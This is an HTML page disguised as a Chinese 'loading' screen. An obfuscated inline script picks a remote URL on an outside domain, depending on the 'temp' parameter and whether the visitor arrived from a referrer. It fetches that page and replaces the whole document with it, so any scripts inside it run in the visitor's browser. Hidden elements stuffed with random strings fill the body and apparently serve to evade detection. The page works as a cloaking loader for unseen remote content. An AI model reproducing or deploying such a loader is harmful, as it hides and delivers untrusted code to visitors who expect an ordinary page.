<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .I8cvx9 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .I8cvx9 .uYwQfApD8 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .I8cvx9 .content {
            line-height: 50px;
            text-align: center
        }

        .I8cvx9 .img {
            width: 100%
        }

        .I8cvx9 .Ig6Dif6mYNi {
            text-align: center
        }

        .I8cvx9 .Ig6Dif6mYNi span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .I8cvx9 .Ig6Dif6mYNi span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .I8cvx9 .Ig6Dif6mYNi span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .I8cvx9 .Ig6Dif6mYNi span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .I8cvx9 .Ig6Dif6mYNi span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .I8cvx9 .Ig6Dif6mYNi span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .I8cvx9 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function tCanvakhOrUUx(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var AjUy0pY = tCanvakhOrUUx('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ AjUy0pY +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ AjUy0pY +".html?a=share";
		}
		
        iPxdxRkWej=url+"#"+new Date().getTime();
        iPxdxRkWej && function() {
            $.get(iPxdxRkWej, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >BdUQT7Rukpex7ajySkco4N9XQK</h1>
<img  src='' style='display:none'>
<ul style='display:none' >uvcavPUVlEexC</ul>
<b style='display:none' >NRyjs9BBBDGo70W0BvyoN1SHjDPhTIZaVk5pXqVLm5f</b>
<div style='display:none'>qFzgkH5fc7vh5g9WQlOFWGZTNXbKTnGtzuJnpzcEO3teGvn0TBguYcX898</div>
<li style='display:none' >Zksrv8S6ypDTQ5HsBGzKrlMwSB9NzLEt</li>
<img  src='' style='display:none'>
<img  src='' style='display:none'><div class="I8cvx9">
    <div class="uYwQfApD8">
        <div class="Ig6Dif6mYNi">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >PJSD87zR89nUdvNfEVawB9yGS04PKX7ZcNGbruOv9zDOWeGlqY7DmYifNFmmReDw6sngOeMfim5MMgN6</li>
<p  style='display:none'>C88V7qkB3QGfrChif9h6G5Oqk5hy3OhYWazwui41xkcNbAGIyHVv</p>
<li style='display:none' >PJSD87zR89nUdvNfEVawB9yGS04PKX7ZcNGbruOv9zDOWeGlqY7DmYifNFmmReDw6sngOeMfim5MMgN6</li>
<b style='display:none' >IRlbyQ3JhgKJEPf3jJvIkosGzthzxL03CXf5SpZoqKyMcwCkG</b>
<img  src='' style='display:none'>
<b style='display:none' >IRlbyQ3JhgKJEPf3jJvIkosGzthzxL03CXf5SpZoqKyMcwCkG</b>
<a  href='#' style='display:none'>RAofbtTqJbX3Sko37d1mx</a>
<a  href='#' style='display:none'>RAofbtTqJbX3Sko37d1mx</a></body>
</html>